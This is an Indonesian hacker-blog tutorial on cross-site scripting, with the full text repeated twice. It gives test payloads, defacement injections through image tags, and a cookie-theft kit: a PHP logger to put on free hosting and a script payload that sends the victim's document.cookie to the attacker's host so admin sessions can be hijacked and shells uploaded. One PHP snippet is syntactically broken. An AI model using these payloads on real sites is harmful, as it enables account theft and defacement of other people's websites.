XSS basic exploit
Wokehh...
kembali ketemu dengan saya Code Igniter a.k.a RSHx0r a.k.a Kecuax Cyber a.k.a GoblogInside
hahaha nick'e wuakeh mennn...
Back to thread... Saya akan share pemahaman saya tentang XSS atau Cross Scripting Site. Kemarin
memang sudah ada posting saya tentang bug yang digunakan Om XNUXER yang ngisengi website KPU yang konon
berharga milyaran rupiah ini. wew... Tapi rasanya ga afdol kalo ga buat artikel yang didasari pemahaman diri
sendiri.
WEll langsung ajah.
Menurut beberapa reverensi, XSS sendiri merupakan suatu kesalahan scripting
yang mengijinkan beberapa karakter tertentu dijalankan sebagai perintah oleh browser.
nah, kesalahan ini biasanya digunakan oleh seorang cracker untuk mendapatkan informasi
login atau sekedar iseng mendeface website dengan bug ini.
"Gimana caranya explore bug ini Mbak RSHx0r?"
Yap. Biasanya para attacker memasukkan script racun mereka lewan address bar atau text field dalam web target
semisal guest box, form login atau lainnya. kemudian mereka memasukkan script berikut pada addressbar untuk mengetes apa situs target
vuln atau tidak
www.target.com/vuln.php?vuln=<h1>ini sebelum ditest</h1>
dimodif jadi:
www.target.com/vuln.php?vuln="<h1>XSS MENNN</h1>"
atau
www.target.com/vuln.php?vuln="<script>alert(‘web masih berpotensi XSS’)</script>"
Kalau muncul pop-up yang bertuliskan pesan diatas berarti website tersebut vulnerable. :))
kalau ga muncul berarti web target aman dan sebaiknya cari web lain untuk belajar =))
Selanjutnya adalah moment yang ditunggu, yaitu explore vuln tersebut sedalam mungkinnnnnn...
1. Pepes ala Chef XSS
wxwxwxwxwx keran pepesnya =))
yah buat mepes web dengan bug XSS kita ga perlu edit file index.html atau upload file defacement
tinggal memanipulasi text input atau address bar seperti yang saya ceritakan di atas.
a. untuk memasukkan gambar deface tinggal masukkan script berikut
www.target.info/guestbook.php?vuln=<html><body><IMG SRC="http://tinypic.com/defacement.png"></body></html>
<IMG SRC="http://tinypic.com/defacement.png"> b. kita bisa mendekorasi deface'an kita dengan marquee, dll sesuai kreatifitas :))
2. Curi cookies
ini menu tingkat tinggi. :)) kita bisa nyuri akun orang dengan cara ini. yang dibutuhkan antaralain
1. hosting yang geratis ajah such as 000webhost atau 0fest.net
2. text editor such as Notepad ++ ato notepad biasa
3. kemampuan coding PHP dikit
tulis/ketik code berikut di notepad, simpen dengan ekstensi .PHP
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
atau
<?php
$kue = $HTTP_GET_VARS["cookie"];
$date = date ("I ds of F Y h:i:s A");
$user_agent = $_SERVER['HTTP_USER AGENT
$file = fopen('log.txt', 'a');
fwrite($file,"DATE: $date || USER AGENT
:$useragent || COOKIE : $cookie\n");
fclose($file);
echo '<b>Maaf, situs dalam perbaikan</br></br></br>klik<a href = http://learnhack.info/">DISINI</a>untuk kembali'
?>
upload ke-hosting, dan tinggal modifikasi link web target dengan script berikit
<script>alert(username.hostingan.com/filephptadi.php)</script>
atau
<script>document.location='username.hostingan.com/filephptadi.php?cookie='+escape(document.cookie)</ script>
Setelah yang tidak beruntung nge-klik link diatas, cookie-nya tercuri dan tersimpan di file "log.txt" Dan kita bisa menggunakan cookie tersebut buat
masuk di site target. Untung-untung dapat cookie Admin, bisa upload shell dan ...
Demikian artikel sayah, kembangkan sesuai kreativitas Anda. Dan di artikel berikut saya akan posting tentang CSRF :)
CMIIW
[quote]Saya menulis artikel ini bukan untuk menggurui atau untuk dianggap hebat.
Saya hanya ingin membagi ilmu tanpa mengenal batas saya bodoh atau Anda yang Genius[/quote]
sumber: ilmuwebsite
Echozine karya Om ->[mRt]<-
http://ninoworking.blogspot.com/2011/03/tutorial-xxs.html
kembali ketemu dengan saya Code Igniter a.k.a RSHx0r a.k.a Kecuax Cyber a.k.a GoblogInside
hahaha nick'e wuakeh mennn...
Back to thread... Saya akan share pemahaman saya tentang XSS atau Cross Scripting Site. Kemarin
memang sudah ada posting saya tentang bug yang digunakan Om XNUXER yang ngisengi website KPU yang konon
berharga milyaran rupiah ini. wew... Tapi rasanya ga afdol kalo ga buat artikel yang didasari pemahaman diri
sendiri.
WEll langsung ajah.
Menurut beberapa reverensi, XSS sendiri merupakan suatu kesalahan scripting
yang mengijinkan beberapa karakter tertentu dijalankan sebagai perintah oleh browser.
nah, kesalahan ini biasanya digunakan oleh seorang cracker untuk mendapatkan informasi
login atau sekedar iseng mendeface website dengan bug ini.
"Gimana caranya explore bug ini Mbak RSHx0r?"
Yap. Biasanya para attacker memasukkan script racun mereka lewan address bar atau text field dalam web target
semisal guest box, form login atau lainnya. kemudian mereka memasukkan script berikut pada addressbar untuk mengetes apa situs target
vuln atau tidak
www.target.com/vuln.php?vuln=<h1>ini sebelum ditest</h1>
dimodif jadi:
www.target.com/vuln.php?vuln="<h1>XSS MENNN</h1>"
atau
www.target.com/vuln.php?vuln="<script>alert(‘web masih berpotensi XSS’)</script>"
Kalau muncul pop-up yang bertuliskan pesan diatas berarti website tersebut vulnerable. :))
kalau ga muncul berarti web target aman dan sebaiknya cari web lain untuk belajar =))
Selanjutnya adalah moment yang ditunggu, yaitu explore vuln tersebut sedalam mungkinnnnnn...
1. Pepes ala Chef XSS
wxwxwxwxwx keran pepesnya =))
yah buat mepes web dengan bug XSS kita ga perlu edit file index.html atau upload file defacement
tinggal memanipulasi text input atau address bar seperti yang saya ceritakan di atas.
a. untuk memasukkan gambar deface tinggal masukkan script berikut
www.target.info/guestbook.php?vuln=<html><body><IMG SRC="http://tinypic.com/defacement.png"></body></html>
<IMG SRC="http://tinypic.com/defacement.png"> b. kita bisa mendekorasi deface'an kita dengan marquee, dll sesuai kreatifitas :))
2. Curi cookies
ini menu tingkat tinggi. :)) kita bisa nyuri akun orang dengan cara ini. yang dibutuhkan antaralain
1. hosting yang geratis ajah such as 000webhost atau 0fest.net
2. text editor such as Notepad ++ ato notepad biasa
3. kemampuan coding PHP dikit
tulis/ketik code berikut di notepad, simpen dengan ekstensi .PHP
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
atau
<?php
$kue = $HTTP_GET_VARS["cookie"];
$date = date ("I ds of F Y h:i:s A");
$user_agent = $_SERVER['HTTP_USER AGENT
$file = fopen('log.txt', 'a');
fwrite($file,"DATE: $date || USER AGENT
:$useragent || COOKIE : $cookie\n");
fclose($file);
echo '<b>Maaf, situs dalam perbaikan</br></br></br>klik<a href = http://learnhack.info/">DISINI</a>untuk kembali'
?>
upload ke-hosting, dan tinggal modifikasi link web target dengan script berikit
<script>alert(username.hostingan.com/filephptadi.php)</script>
atau
<script>document.location='username.hostingan.com/filephptadi.php?cookie='+escape(document.cookie)</
Setelah yang tidak beruntung nge-klik link diatas, cookie-nya tercuri dan tersimpan di file "log.txt" Dan kita bisa menggunakan cookie tersebut buat
masuk di site target. Untung-untung dapat cookie Admin, bisa upload shell dan ...
Demikian artikel sayah, kembangkan sesuai kreativitas Anda. Dan di artikel berikut saya akan posting tentang CSRF :)
CMIIW
[quote]Saya menulis artikel ini bukan untuk menggurui atau untuk dianggap hebat.
Saya hanya ingin membagi ilmu tanpa mengenal batas saya bodoh atau Anda yang Genius[/quote]
sumber: ilmuwebsite
Echozine karya Om ->[mRt]<-
http://ninoworking.blogspot.com/2011/03/tutorial-xxs.html